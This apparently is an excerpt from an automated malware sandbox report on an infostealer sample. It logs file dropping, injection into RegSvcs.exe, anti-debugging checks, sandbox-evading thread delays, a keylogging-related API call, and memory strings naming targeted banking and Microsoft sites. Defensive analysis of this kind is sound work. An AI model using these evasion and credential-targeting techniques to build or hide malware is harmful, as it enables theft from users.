Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FD979D
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00FD5C97

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598121	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597942	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597634	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597528	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597416	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594857	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597739	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000007.00000002.4501981731.000000000118E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4502180233.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_06339548 LdrInitializeThunk,LdrInitializeThunk,

3_2_06339548

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B1EAA2 BlockInput,

0_2_00B1EAA2

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00AD2622

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA42DE

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]	0_2_00AC4CE8
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_017C6FF8 mov eax, dword ptr fs:[00000030h]	0_2_017C6FF8
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_017C6F98 mov eax, dword ptr fs:[00000030h]	0_2_017C6F98
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_017C5928 mov eax, dword ptr fs:[00000030h]	0_2_017C5928
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F84CE8 mov eax, dword ptr fs:[00000030h]	2_2_00F84CE8
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_0128E310 mov eax, dword ptr fs:[00000030h]	2_2_0128E310
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_0128E370 mov eax, dword ptr fs:[00000030h]	2_2_0128E370
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_0128CCA0 mov eax, dword ptr fs:[00000030h]	2_2_0128CCA0
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 6_2_01405DD8 mov eax, dword ptr fs:[00000030h]	6_2_01405DD8
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 6_2_01404768 mov eax, dword ptr fs:[00000030h]	6_2_01404768
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 6_2_01405E38 mov eax, dword ptr fs:[00000030h]	6_2_01405E38

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00B00B62

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AD2622
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00AC083F
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC09D5 SetUnhandledExceptionFilter,	0_2_00AC09D5
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00AC0C21
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F92622
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F8083F
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F809D5 SetUnhandledExceptionFilter,	2_2_00F809D5
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00F80C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
